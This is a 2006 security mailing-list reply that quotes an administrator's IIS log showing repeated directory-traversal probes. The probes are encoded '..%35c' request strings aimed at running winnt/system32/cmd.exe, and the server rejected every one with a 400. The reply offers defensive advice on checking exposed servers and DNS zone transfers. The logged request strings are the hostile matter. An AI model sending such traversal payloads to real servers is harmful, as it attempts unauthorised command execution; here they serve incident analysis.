Since your IIS Server responded with HTTP 400 responses, there's not reason to panic. However should consider doing some further investigation. From a web server standpoint, you'll have reason to be concerned if your IIS Server is generating HTTP 200 responses to requests that it's not intended to serve, but from the snippet you provided below, that's not the case.
A few thoughts off the top of my head to consider. Has your company hired someone to perform a penetration test? (based on the fact that the source IP coming from the Netherlands, the pen. test theory is not likely) It seems that this IIS Server is hosting an Internet site, is it on a protected subnet within your network (DMZ), what else is on that subnet? Is this Server hosting anything other than IIS? you'll probably want to comb through more logs on that system and potentially on other servers that have public exposure (Such as SMTP, DNS, other web servers, etc.) Do your public DNS servers allow domain transfers to anyone on the internet? If so consider looking at each of those servers as well, or contact the administrators of those servers if they are not your responsibility. -Cheers -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Tuesday, December 12, 2006 10:02 AM To: [email protected] Subject: IIS http error log entries... Hello list, i hope i got the right group, i just found these in my IIS logs: ----------------------- 2006-12-08 11:38:18 87.17.7.5 2842 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:38:29 87.17.7.5 2929 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:38:44 87.17.7.5 2872 192.168.x.x 80 HTTP/1.0 HEAD /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:38:44 87.17.7.5 3420 192.168.x.x 80 HTTP/1.0 HEAD /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:38:58 87.17.7.5 1332 192.168.x.x 80 HTTP/1.0 HEAD /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32 /cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:38:58 87.17.7.5 2105 192.168.x.x 80 HTTP/1.0 HEAD /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/ c+dir+c:\ 400 - URL - 2006-12-08 11:39:46 87.17.7.5 2435 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond - 2006-12-08 11:40:36 87.17.7.5 1933 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond - 2006-12-08 11:40:41 87.17.7.5 4144 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond - 2006-12-08 11:40:44 87.17.7.5 4234 192.168.x.x 80 HTTP/1.0 HEAD /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:40:50 87.17.7.5 1130 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir +c:\ 400 - URL - 2006-12-08 11:40:50 87.17.7.5 1411 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:41:11 87.17.7.5 1427 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond - 2006-12-08 11:41:24 87.17.7.5 4715 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn t/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:41:35 87.17.7.5 1568 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: \ 400 - URL - 2006-12-08 11:41:41 87.17.7.5 4751 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond - 2006-12-08 11:41:44 87.17.7.5 1595 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - ------------------------- I don't have much expirience with this kind of thing, and from digging the net i found that this was used in Nimda attacks few years ago... any idea what's going on? Should i be worried? ------------------------------------------------------------------------ --- ------------------------------------------------------------------------ --- Blue Cross Blue Shield of Florida, Inc., and its subsidiary and affiliate companies are not responsible for errors or omissions in this e-mail message. Any personal comments made in this e-mail do not reflect the views of Blue Cross Blue Shield of Florida, Inc. The information contained in this document may be confidential and intended solely for the use of the individual or entity to whom it is addressed. This document may contain material that is privileged or protected from disclosure under applicable law. If you are not the intended recipient or the individual responsible for delivering to the intended recipient, please (1) be advised that any use, dissemination, forwarding, or copying of this document IS STRICTLY PROHIBITED; and (2) notify sender immediately by telephone and destroy the document. THANK YOU. --------------------------------------------------------------------------- ---------------------------------------------------------------------------
